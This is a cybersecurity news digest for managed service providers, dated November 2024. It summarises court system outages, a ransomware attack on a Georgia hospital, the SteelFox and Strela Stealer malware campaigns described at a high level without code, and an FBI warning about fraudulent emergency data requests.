MSP cybersecurity news digest, November 12, 2024

Washington and California courts experience technology outages due to cyberattack

Washington state’s court systems were experiencing outages due to a potential cyber intrusion. This data system outage affected all state courts' judicial information systems, websites and associated services.

The Washington State Administrative Office of the Courts (AOC) confirmed "unauthorized activity" on their network and warned of intermittent disruptions. Courts in multiple counties and cities, including King and Pierce, reported impacts, with some experiencing issues in electronic filing and phone systems. While Pierce County Superior Court noted minimal effects, Thurston County postponed scheduled hearings.

The AOC did not specify whether it was a ransomware attack and remained silent on further details as its website stayed offline. This incident follows similar recent cyberattacks on California’s San Joaquin County Superior Court, which disrupted all digital services. Courts across the U.S. have faced a surge of such attacks over the past year, affecting operations significantly.

Georgia hospital experiences ransomware attack, disrupting its electronic health record system

Memorial Hospital and Manor in Bainbridge, Georgia, has been hit by a ransomware attack that disrupted the access to its electronic health record system.

The hospital, which serves Decatur County and surrounding areas, reported the issue. Although the hospital said the attack did not affect the level of patient care, the hospital did switch to pen-and-paper processes. IT specialists began system recovery after antivirus software flagged the threat. The hospital warned of potentially longer wait times but did not disclose whether any data breach occurred.

The Embargo ransomware gang, active since April 2024 and responsible for other U.S. health care attacks, claimed responsibility for this attack and the theft of 1.15 TB of data.

Cryptocurrency mined and credit card data stolen by new SteelFox malware package

SteelFox is a new malware package that mines cryptocurrency and steals credit card data, using the “bring your own vulnerable driver” method to gain SYSTEM privileges on Windows machines.

Distributed via torrent trackers and forums as crack tools for legitimate software like Foxit PDF Editor, JetBrains and AutoCAD, SteelFox tricks users seeking free activation tools. Once users run these tools, the malware drops hidden code that loads SteelFox, while still appearing legitimate until unpacking. The malware escalates privileges by running WinRing0.sys, a driver vulnerable to CVE-2020-14979 and CVE-2021-41285, gaining NT/SYSTEM-level access. With this high-level access, SteelFox installs a modified XMRig miner for Monero and connects to a mining pool using hardcoded credentials.

Additionally, the malware communicates with a command-and-control server through SSL pinning and TLS v1.3 for secure data transfer. It also deploys an infostealer that collects data from 13 browsers, including credit card details, browsing history and cookies. Researchers have observed SteelFox infections in countries like Brazil and China, as well as highlighted its advanced development and significant threat level.

Strela Stealer malware targeting employees in Germany and Spain with phishing emails

A new Strela Stealer campaign is targeting employees in Germany and Spain, using phishing emails with zip file attachments that carry a mail credential stealer.

The malware uses a highly obfuscated JavaScript file that, when executed, initiates a PowerShell command reaching out to a WebDAV server to download a malicious DLL loader. This DLL, complex with numerous conditional jumps, loads the main payload while evading disk-based detection. The final payload, Strela Stealer, first discovered in 2022, has been improved to include control flow obfuscation, making analysis difficult, and uses strong encryption to safeguard stolen data.

The malware checks for specific locales (German, Spanish, Basque) before activation, targeting mail clients like Outlook and Thunderbird to collect credentials and system data. Once information is gathered, it is sent to an attacker-controlled server.

Cybercriminals using fraudulent emergency data requests, posing as law enforcement: FBI alert

The FBI has warned of a rise in fraudulent emergency data requests (EDRs) used by cybercriminals impersonating law enforcement through compromised government emails.

EDRs enable U.S. law enforcement to access data from tech providers during emergencies without a warrant. While designed for life-or-death scenarios, cybercriminals exploit EDRs to bypass review processes and swiftly obtain data. The Lapsus$ threat actor group pioneered this method, but recent reports show a significant increase in such fraudulent activities.

The alert highlighted six cases of criminals selling sensitive information on dark forums, with some criminals even offering tutorials on submitting fake EDRs. To counter these threats, the FBI advises companies to verify EDR authenticity, enhance cybersecurity measures and maintain contact with local FBI field offices.